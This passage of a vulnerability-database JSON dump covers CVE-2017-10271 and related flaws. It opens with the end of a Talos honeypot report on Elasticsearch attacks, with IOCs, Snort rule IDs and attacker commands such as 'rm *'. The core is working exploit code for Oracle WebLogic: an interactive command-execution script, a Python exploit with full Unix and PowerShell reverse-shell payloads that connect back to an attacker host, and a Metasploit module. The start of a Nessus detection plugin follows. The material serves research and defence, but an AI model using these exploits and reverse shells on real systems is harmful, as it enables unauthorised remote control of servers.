payloads that execute both \"echo 'qq952135763'\" and \"echo '952135763,'\" suggesting that the attacks are related to the same QQ account. However, none of the IPs associated with these attacks have been observed attempting to download the \"LinuxT\" payload linked to this attacker. Additionally, unlike other activity associated with this attacker, these attacks leveraged the newer Elasticsearch vulnerability rather than the older one. \n \nThe three remaining actors that Talos identified have not been observed delivering any malware through their exploits. One actor issued an \"rm *\" command, while the other two actors were fingerprinting vulnerable servers by issuing 'whoami' and 'id' commands. \n \n\n\n## Conclusion\n\n \nTalos has observed multiple attackers exploiting CVE-2014-3120 and CVE-2015-1427 in our Elasticsearch honeypots to drop a variety of malicious payloads. Additionally, Talos has identified some social media accounts we believe could belong to the threat actor dropping the \"LinuxT\" payload. These Elasticsearch vulnerabilities only exist in versions 1.4.2 and lower, so any cluster running a modern version of Elasticsearch is unaffected by these vulnerabilities. Given the size and sensitivity of the data sets these clusters contain, the impact of a breach of this nature could be severe. Talos urges readers to patch and upgrade to a newer version of Elasticsearch if at all possible. Additionally, Talos highly recommends disabling the ability to send scripts through search queries if that ability is not strictly necessary for your use cases. \n \n\n\n## Coverage\n\n \nThe following SNORT\u24c7 rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org. \n \n**CVE-2014-3120:** 33830, 36256, 44690 \n \n**CVE-2015-1427:** 33814,36067 \n \n**CVE-2017-10271:** 45304 \n \n**CVE-2018-7600:** 46316 \n \n**CVE-2018-1273:** 46473 \n \nAdditional ways our customers can detect and block this threat are listed below. \n \n \nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nEmail Security can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat. \n \nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products. \n \nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \n\n\n## IOCs:\n\n \n**First Actor:** \n \n**Attacking IP addresses:** \n \n101[.]200[.]48[.]68 \n117[.]205[.]7[.]194 \n107[.]182[.]183[.]206 \n124[.]43[.]19[.]159 \n139[.]99[.]131[.]57 \n179[.]50[.]196[.]228 \n185[.]165[.]116[.]144 \n189[.]201[.]192[.]242 \n191[.]189[.]30[.]112 \n192[.]210[.]198[.]50 \n195[.]201[.]169[.]194 \n216[.]15[.]146[.]34 \n43[.]240[.]65[.]121 \n45[.]76[.]136[.]196 \n45[.]76[.]178[.]34 \n52[.]8[.]60[.]118 \n54[.]70[.]161[.]251 \n139[.]159[.]218[.]82 \n \n**IP addresses and ports hosting malware:** \n \n45[.]76[.]122[.]92:8506 \n207[.]148[.]70[.]143:8506 \n \n**SHA256 of delivered malware:** \n \nbbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 e2f1be608c2cece021e68056f2897d88ed855bafd457e07e62533db6dfdc00dc \n191f1126f42b1b94ec248a7bbb60b354f2066b45287cd1bdb23bd39da7002a8c \n2bcc9fff40053ab356ddde6de55077f8bf83d8dfa6d129c250f521eb170dc123 \n9a181c6a1748a9cfb46751a2cd2b27e3e742914873de40402b5d40f334d5448c 5fe3b0ba0680498dbf52fb8f0ffc316f3a4d7e8202b3ec710b2ae63e70c83b90 \n7b08a8dae39049aecedd9679301805583a77a4271fddbafa105fa3b1b507baa3 \n \n**Second Actor:** \n \n**Attacking IP address:** \n \n202[.]109[.]143[.]110 \n \n**IP address and port hosting malware:** \n \n216[.]176[.]179[.]106:9090 \n \n**SHA256 of delivered malware:** \n \nbbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 \n \n**Third Actor:** \n \n**Attacking IP addresses:** \n \n125[.]231[.]139[.]75 \n36[.]235[.]171[.]244 \n \n**IP addresses linked to QQ account, but not delivering malware:** \n \n121[.]207[.]227[.]84 \n125[.]77[.]30[.]184 \n \n**IP address and port hosting malware:** \n \n104[.]203[.]170[.]198:5522 \n \n**SHA256 of malware hosted on above IP address:** \n \n7f18c8beb8e37ce41de1619b2d67eb600ace062e23ac5a5d9a9b2b3dfaccf79b dac92c84ccbb88f058b61deadb34a511e320affa7424f3951169cba50d700500 e5a04653a3bfbac53cbb40a8857f81c8ec70927a968cb62e32fd36143a6437fc d3447f001a6361c8454c9e560a6ca11e825ed17f63813074621846c43d6571ba 709d04dd39dd7f214f3711f7795337fbb1c2e837dddd24e6d426a0d6c306618e 830db6a2a6782812848f43a4e1229847d92a592671879ff849bc9cf08259ba6a \n \n**Remaining actors:** \n \n**Attacking IP addresses:** \n \n111[.]19[.]78[.]4 \n15[.]231[.]235[.]194 \n221[.]203[.]81[.]226 \n111[.]73[.]45[.]90 \n121[.]207[.]227[.]84 \n125[.]77[.]30[.]184 \n \n\n\n", "cvss3": {}, "published": "2019-02-26T10:56:00", "type": "talosblog", "title": "Cisco Talos Honeypot Analysis Reveals Rise in Attacks on Elasticsearch Clusters", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271", "CVE-2018-1273", "CVE-2018-7600"], "modified": "2019-03-01T15:56:50", "id": "TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/uGLhJU8rCm8/cisco-talos-honeypot-analysis-reveals.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOracle WebLogic Server 10.3.6.0.0 12.x - Remote Command Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-12-26T00:00:00", "type": "exploitpack", "title": "Oracle WebLogic Server 10.3.6.0.0 12.x - Remote Command Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2017-12-26T00:00:00", "id": "EXPLOITPACK:C22F157FABAD412B7D508C7EEC750856", "href": "", "sourceData": "import requests\nimport sys\n\nurl_in = sys.argv[1]\npayload_url = url_in + \"/wls-wsat/CoordinatorPortType\"\npayload_header = {'content-type': 'text/xml'}\n\n\ndef payload_command (command_in):\n html_escape_table = {\n \"&\": \"&\",\n '\"': \"\"\",\n \"'\": \"&apos;\",\n \">\": \">\",\n \"<\": \"<\",\n }\n command_filtered = \"<string>\"+\"\".join(html_escape_table.get(c, c) for c in command_in)+\"</string>\"\n payload_1 = \"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\"> \\n\" \\\n \" <soapenv:Header> \" \\\n \" <work:WorkContext xmlns:work=\\\"http://bea.com/2004/06/soap/workarea/\\\"> \\n\" \\\n \" <java version=\\\"1.8.0_151\\\" class=\\\"java.beans.XMLDecoder\\\"> \\n\" \\\n \" <void class=\\\"java.lang.ProcessBuilder\\\"> \\n\" \\\n \" <array class=\\\"java.lang.String\\\" length=\\\"3\\\">\" \\\n \" <void index = \\\"0\\\"> \" \\\n \" <string>cmd</string> \" \\\n \" </void> \" \\\n \" <void index = \\\"1\\\"> \" \\\n \" <string>/c</string> \" \\\n \" </void> \" \\\n \" <void index = \\\"2\\\"> \" \\\n + command_filtered + \\\n \" </void> \" \\\n \" </array>\" \\\n \" <void method=\\\"start\\\"/>\" \\\n \" </void>\" \\\n \" </java>\" \\\n \" </work:WorkContext>\" \\\n \" </soapenv:Header>\" \\\n \" <soapenv:Body/>\" \\\n \"</soapenv:Envelope>\"\n return payload_1\n\ndef do_post(command_in):\n result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)\n\n if result.status_code == 500:\n print \"Command Executed \\n\"\n else:\n print \"Something Went Wrong \\n\"\n\n\n\nprint \"***************************************************** \\n\" \\\n \"**************** Coded By 1337g ****************** \\n\" \\\n \"* CVE-2017-10271 Blind Remote Command Execute EXP * \\n\" \\\n \"***************************************************** \\n\"\n\nwhile 1:\n command_in = raw_input(\"Eneter your command here: \")\n if command_in == \"exit\" : exit(0)\n do_post(command_in)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOracle WebLogic 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-01-03T00:00:00", "type": "exploitpack", "title": "Oracle WebLogic 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-03T00:00:00", "id": "EXPLOITPACK:E47A4ABCB334901131160C872A570166", "href": "", "sourceData": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Exploit Title: Weblogic wls-wsat Component Deserialization RCE\n# Date Authored: Jan 3, 2018\n# Date Announced: 10/19/2017\n# Exploit Author: Kevin Kirsche (d3c3pt10n)\n# Exploit Github: https://github.com/kkirsche/CVE-2017-10271\n# Exploit is based off of POC by Luffin from Github\n# https://github.com/Luffin/CVE-2017-10271\n# Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html\n# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0\n# Tested on: Oracle WebLogic 10.3.6.0.0 running on Oracle Linux 6.8 and Ubuntu 14.04.4 LTS\n# CVE: CVE-2017-10271\n# Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/\n# (Python 3) Example check listener: python3 -m http.server 4444\n# (Python 2) Example check listener: python -m SimpleHTTPServer 4444\n# (Netcat) Example exploit listener: nc -nlvp 4444\n\nfrom sys import exit\nfrom requests import post\nfrom argparse import ArgumentParser\nfrom random import choice\nfrom string import ascii_uppercase, ascii_lowercase, digits\nfrom xml.sax.saxutils import escape\n\nclass Exploit:\n\n def __init__(self, check, rhost, lhost, lport, windows):\n self.url = rhost if not rhost.endswith('/') else rhost.strip('/')\n self.lhost = lhost\n self.lport = lport\n self.check = check\n if windows:\n self.target = 'win'\n else:\n self.target = 'unix'\n\n if self.target == 'unix':\n # Unix reverse shell\n # You should also be able to instead use something from MSFVenom. E.g.\n # msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444\n self.cmd_payload = (\n \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.\"\n \"SOCK_STREAM);s.connect((\\\"{lhost}\\\",{lport}));os.dup2(s.fileno(),0); os.dup2(\"\n \"s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\"\n ).format(lhost=self.lhost, lport=self.lport)\n else:\n # Windows reverse shell\n # Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444\n self.cmd_payload = (\n r\"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) \"\n r\"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='\" + self.lhost +\"\"\n r\"';$p='\"+ self.lport + \"';$c=New-Object system.net.sockets.tcpclient;$c.connect($a\"\n r\",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;\"\n r\"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';\"\n r\"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;\"\n r\"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;\"\n r\"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;\"\n r\"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};\"\n r\"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;\"\n r\"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)\"\n r\" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;\"\n r\"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};\"\n r\"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if \"\n r\"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne\"\n r\" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.\"\n r\"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\"\n )\n self.cmd_payload = escape(self.cmd_payload)\n\n def cmd_base(self):\n if self.target == 'win':\n return 'cmd'\n return '/bin/sh'\n\n def cmd_opt(self):\n if self.target == 'win':\n return '/c'\n return '-c'\n\n\n def get_generic_check_payload(self):\n random_uri = ''.join(\n choice(ascii_uppercase + ascii_lowercase + digits)\n for _ in range(16))\n generic_check_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n <object id=\"url\" class=\"java.net.URL\">\n <string>http://{lhost}:{lport}/{random_uri}</string>\n </object>\n <object idref=\"url\">\n <void id=\"stream\" method = \"openStream\" />\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n'''\n\n return generic_check_payload.format(\n lhost=self.lhost, lport=self.lport, random_uri=random_uri)\n\n def get_process_builder_payload(self):\n process_builder_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java>\n <object class=\"java.lang.ProcessBuilder\">\n <array class=\"java.lang.String\" length=\"3\" >\n <void index=\"0\">\n <string>{cmd_base}</string>\n </void>\n <void index=\"1\">\n <string>{cmd_opt}</string>\n </void>\n <void index=\"2\">\n <string>{cmd_payload}</string>\n </void>\n </array>\n <void method=\"start\"/>\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n'''\n return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),\n cmd_payload=self.cmd_payload)\n\n def print_banner(self):\n print(\"=\" * 80)\n print(\"CVE-2017-10271 RCE Exploit\")\n print(\"written by: Kevin Kirsche (d3c3pt10n)\")\n print(\"Remote Target: {rhost}\".format(rhost=self.url))\n print(\"Shell Listener: {lhost}:{lport}\".format(\n lhost=self.lhost, lport=self.lport))\n print(\"=\" * 80)\n\n def post_exploit(self, data):\n headers = {\n \"Content-Type\":\n \"text/xml;charset=UTF-8\",\n \"User-Agent\":\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36\"\n }\n payload = \"/wls-wsat/CoordinatorPortType\"\n\n vulnurl = self.url + payload\n try:\n req = post(\n vulnurl, data=data, headers=headers, timeout=10, verify=False)\n if self.check:\n print(\"[*] Did you get an HTTP GET request back?\")\n else:\n print(\"[*] Did you get a shell back?\")\n except Exception as e:\n print('[!] Connection Error')\n print(e)\n\n def run(self):\n self.print_banner()\n if self.check:\n print('[+] Generating generic check payload')\n payload = self.get_generic_check_payload()\n else:\n print('[+] Generating execution payload')\n payload = self.get_process_builder_payload()\n print('[*] Generated:')\n print(payload)\n if self.check:\n print('[+] Running generic check payload')\n else:\n print('[+] Running {target} execute payload').format(target=self.target)\n\n self.post_exploit(data=payload)\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(\n description=\n 'CVE-2017-10271 Oracle WebLogic Server WLS Security exploit. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.'\n )\n parser.add_argument(\n '-l',\n '--lhost',\n required=True,\n dest='lhost',\n nargs='?',\n help='The listening host that the remote server should connect back to')\n parser.add_argument(\n '-p',\n '--lport',\n required=True,\n dest='lport',\n nargs='?',\n help='The listening port that the remote server should connect back to')\n parser.add_argument(\n '-r',\n '--rhost',\n required=True,\n dest='rhost',\n nargs='?',\n help='The remote host base URL that we should send the exploit to')\n parser.add_argument(\n '-c',\n '--check',\n dest='check',\n action='store_true',\n help=\n 'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.'\n )\n parser.add_argument(\n '-w',\n '--win',\n dest='windows',\n action='store_true',\n help=\n 'Use the windows cmd payload instead of unix payload (execute mode only).'\n )\n\n args = parser.parse_args()\n\n exploit = Exploit(\n check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport,\n windows=args.windows)\n exploit.run()", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "metasploit": [{"lastseen": "2023-03-23T01:32:13", "description": "The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check and will not be used when executing the exploit itself.\n", "cvss3": {}, "published": "2018-01-05T20:05:21", "type": "metasploit", "title": "Oracle WebLogic wls-wsat Component Deserialization RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2022-03-09T23:28:25", "id": "MSF:EXPLOIT-MULTI-HTTP-ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/oracle_weblogic_wsat_deserialization_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n # include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE',\n 'Description' => %q(\n The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization\n remote code execution vulnerability. Supported versions that are affected are\n 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin\n of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT,\n HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check\n and will not be used when executing the exploit itself.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module\n 'Luffin', # Proof of Concept\n 'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery\n ],\n 'References' =>\n [\n ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin\n ['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept\n ['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit\n ['CVE', '2017-10271'],\n ['EDB', '43458']\n ],\n 'Platform' => %w{ win unix },\n 'Arch' => [ ARCH_CMD ],\n 'Targets' =>\n [\n [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],\n [ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]\n ],\n 'DisclosureDate' => '2017-10-19',\n # Note that this is by index, rather than name. It's generally easiest\n # just to put the default at the beginning of the list and skip this\n # entirely.\n 'DefaultTarget' => 0\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),\n OptPort.new('RPORT', [true, \"The remote port that the WebLogic WSAT endpoint listens on\", 7001]),\n OptFloat.new('TIMEOUT', [true, \"The timeout value of requests to RHOST\", 20.0]),\n # OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])\n ])\n end\n\n def cmd_base\n if target['Platform'] == 'win'\n return 'cmd'\n else\n return '/bin/sh'\n end\n end\n\n def cmd_opt\n if target['Platform'] == 'win'\n return '/c'\n else\n return '-c'\n end\n end\n\n\n #\n # This generates a XML payload that will execute the desired payload on the RHOST\n #\n def exploit_process_builder_payload\n # Generate a payload which will execute on a *nix machine using /bin/sh\n xml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java>\n <void class=\"java.lang.ProcessBuilder\">\n <array class=\"java.lang.String\" length=\"3\" >\n <void index=\"0\">\n <string>#{cmd_base}</string>\n </void>\n <void index=\"1\">\n <string>#{cmd_opt}</string>\n </void>\n <void index=\"2\">\n <string>#{payload.encoded.encode(xml: :text)}</string>\n </void>\n </array>\n <void method=\"start\"/>\n </void>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>}\n end\n\n #\n # This builds a XML payload that will generate a HTTP GET request to our SRVHOST\n # from the target machine.\n #\n def check_process_builder_payload\n xml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n <void id=\"url\" class=\"java.net.URL\">\n <string>#{get_uri.encode(xml: :text)}</string>\n </void>\n <void idref=\"url\">\n <void id=\"stream\" method = \"openStream\" />\n </void>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>}\n end\n\n #\n # In the event that a 'check' host responds, we should respond randomly so that we don't clog up\n # the logs too much with a no response error or similar.\n #\n def on_request_uri(cli, request)\n random_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>'\n send_response(cli, random_content)\n\n @received_request = true\n end\n\n #\n # The exploit method connects to the remote service and sends a randomly generated string\n # encapsulated within a SOAP XML body. This will start an HTTP server for us to receive\n # the response from. This is based off of the exploit technique from\n # exploits/windows/novell/netiq_pum_eval.rb\n #\n # This doesn't work as is because MSF cannot mix HttpServer and HttpClient\n # at the time of authoring this\n #\n # def check\n # start_service\n #\n # print_status('Sending the check payload...')\n # res = send_request_cgi({\n # 'method' => 'POST',\n # 'uri' => normalize_uri(target_uri.path),\n # 'data' => check_process_builder_payload,\n # 'ctype' => 'text/xml;charset=UTF-8'\n # }, datastore['TIMEOUT'])\n #\n # print_status(\"Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...\")\n #\n # waited = 0\n # until @received_request\n # sleep 1\n # waited += 1\n # if waited > datastore['HTTP_DELAY']\n # cleanup_service\n # return Exploit::CheckCode::Safe\n # end\n # end\n #\n # cleanup_service\n # return Exploit::CheckCode::Vulnerable\n # end\n\n #\n # The exploit method connects to the remote service and sends the specified payload\n # encapsulated within a SOAP XML body.\n #\n def exploit\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'data' => exploit_process_builder_payload,\n 'ctype' => 'text/xml;charset=UTF-8'\n }, datastore['TIMEOUT'])\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2023-05-18T14:22:37", "description": "The remote Oracle WebLogic server is affected by a remote code execution vulnerability in the WSAT endpoint due to unsafe deserialization of XML encoded Java objects. An unauthenticated, remote attacker can exploit this, via a crafted Java object, to execute arbitrary Java code in the context of the WebLogic server.", "cvss3": {}, "published": "2017-12-28T00:00:00", "type": "nessus", "title": "Oracle WebLogic WSAT Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:weblogic_server"], "id": "WEBLOGIC_2017_10271.NASL", "href": "https://www.tenable.com/plugins/nessus/105484", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105484);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-10271\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n\n script_name(english:\"Oracle WebLogic WSAT Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability in the WSAT endpoint due to unsafe\ndeserialization of XML encoded Java objects. An unauthenticated,\nremote attacker can exploit this, via a crafted Java object, \nto execute arbitrary Java code in the context of the WebLogic\nserver.\");\n # https://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b680917f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the October 2017 Oracle\nCritical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle WebLogic wls-wsat Component Deserialization RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"weblogic_detect.nasl\");\n script_require_keys(\"www/weblogic\");\n script_require_ports(\"Services/www\", 80, 7001);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nappname = \"Oracle WebLogic Server\";\n\nget_kb_item_or_exit(\"www/weblogic\");\nport = get_http_port(default:7001, embedded:FALSE);\nget_kb_item_or_exit(\"www/weblogic/\" + port + \"/installed\");\n\n# establish if WSAT is enabled. If it isn't then we don't\n# need to proceed any futher\nres = http_send_recv3(\n method:'GET',\n 